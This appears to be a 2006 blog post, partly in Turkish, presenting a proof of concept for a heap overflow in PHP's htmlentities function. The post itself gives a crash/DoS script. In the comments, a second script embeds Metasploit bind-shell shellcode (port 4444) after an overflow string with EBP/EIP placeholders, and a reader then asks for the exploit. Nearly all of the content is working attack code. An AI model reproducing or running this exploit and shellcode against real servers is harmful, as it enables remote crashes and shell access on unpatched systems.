PoC / Exploit for PHP HTML Entity Encoder Heap Overflow Vulnerability - Crash/DoS?

07.11.2006

Okuyucu : 7.456
Günlük Okuyucu : 13,4

I like Proof of Concepts, so this is a simple PoC for PHP HTML Entity Encoder Heap Overflow Vulnerability. You can supply payload from requets so it's remote.

Original Advisory : http://www.securityfocus.com/archive/1/450431

// PHP 5 <= 5.1.6, PHP 4 <= 4.4.4
$fuzzFixed="";
echo "something... we need this stupid echo or do something else...";

for($pl=0; $pl<64; $pl++)
$fuzzFixed .= code2utf(977);

htmlentities($fuzzFixed , ENT_NOQUOTES, "utf-8" );

function code2utf($num){
return chr(($num>>6)+192).chr(($num&63)+128);
}

echo "ehm...";
?>

Yorumlar

Bu makalenin yorumlarını RSS ile takip et!

<?
$fuzzFixed="A";
#/* linux_ia32_bind - LPORT=4444 Size=108 Encoder=PexFnstenvSub http://metasploit.com */
$shellcode =
"\x2b\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x64"
"\xb4\xc7\x69\x83\xeb\xfc\xe2\xf4\x55\x6f\x94\x2a\x37\xde\xc5\x03"
"\x02\xec\x5e\xe0\x85\x79\x47\xff\x27\xe6\xa1\x01\x75\xe8\xa1\x3a"
"\xed\x55\xad\x0f\x3c\xe4\x96\x3f\xed\x55\x0a\xe9\xd4\xd2\x16\x8a"
"\xa9\x34\x95\x3b\x32\xf7\x4e\x88\xd4\xd2\x0a\xe9\xf7\xde\xc5\x30"
"\xd4\x8b\x0a\xe9\x2d\xcd\x3e\xd9\x6f\xe6\xaf\x46\x4b\xc7\xaf\x01"
"\x4b\xd6\xae\x07\xed\x57\x95\x3a\xed\x55\x0a\xe9";

echo "hmm";

for($pl=0; $pl<63; $pl++)
$fuzzFixed .= code2utf(977);
if($pl == "63") {
$fuzzFixed .= "BBBB"; #jump to ebp
$fuzzFixed .= "CCCC"; #ahh eip
$fuzzFixed .= "$shellcode";
}
htmlentities($fuzzFixed , ENT_NOQUOTES, "utf-8" );

function code2utf($num){
return chr(($num>>6)+192).chr(($num&63)+128);
}

echo "ehm...";
?>

Tontonq [ # | 01.12.2006 ]

May you sent the EXP for PoC / Exploit for PHP HTML Entity Encoder Heap Overflow Vulnerability to me,Please
THX in advance.Lol

Tr4c3 [ # | 26.12.2006 ]

Yorum Ekle